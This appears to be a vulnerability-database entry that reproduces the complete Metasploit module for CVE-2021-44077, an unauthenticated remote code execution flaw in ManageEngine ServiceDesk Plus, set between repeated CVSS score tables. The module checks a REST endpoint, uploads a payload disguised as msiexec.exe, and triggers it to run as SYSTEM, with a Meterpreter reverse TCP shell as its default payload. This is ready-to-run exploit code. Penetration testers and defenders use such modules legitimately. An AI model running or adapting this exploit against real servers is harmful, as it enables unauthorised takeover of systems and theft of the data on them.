9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
'Description' => %q{
This module exploits CVE-2021-44077, an unauthenticated remote code
execution vulnerability in ManageEngine ServiceDesk Plus, to upload an
EXE (msiexec.exe) and execute it as the SYSTEM account.
Note that build 11305 is vulnerable to the authentication bypass but
not the file upload. The module will check for an exploitable build.
},
'Author' => [
# Discovered by unknown threat actors
'wvu', # Analysis and exploit
'Y4er' # Additional confirmation
],
'References' => [
['CVE', '2021-44077'],
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
],
'DisclosureDate' => '2021-09-16',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Windows Dropper', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8080,
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')
)
unless res
return CheckCode::Unknown('Target failed to respond to check.')
end
# NOTE: /RestAPI/ImportTechnicians was removed after build 11303
unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')
return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')
end
CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
end
def exploit
upload_msiexec
execute_msiexec
end
def upload_msiexec
print_status('Uploading msiexec.exe')
form = Rex::MIME::Message.new
form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')
form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',
'form-data; name="theFile"; filename="msiexec.exe"')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)
unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')
fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')
end
print_good('Successfully uploaded msiexec.exe')
end
def execute_msiexec
print_status('Executing msiexec.exe')
# This endpoint "won't" return
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),
'vars_post' => {
'execute' => 's247AgentInstallationProcess'
}
}, 0)
end
# XXX: FileDropper dies a miserable death if the file is in use
def on_new_session(_session)
super
# Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7
print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")
end
end
`
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P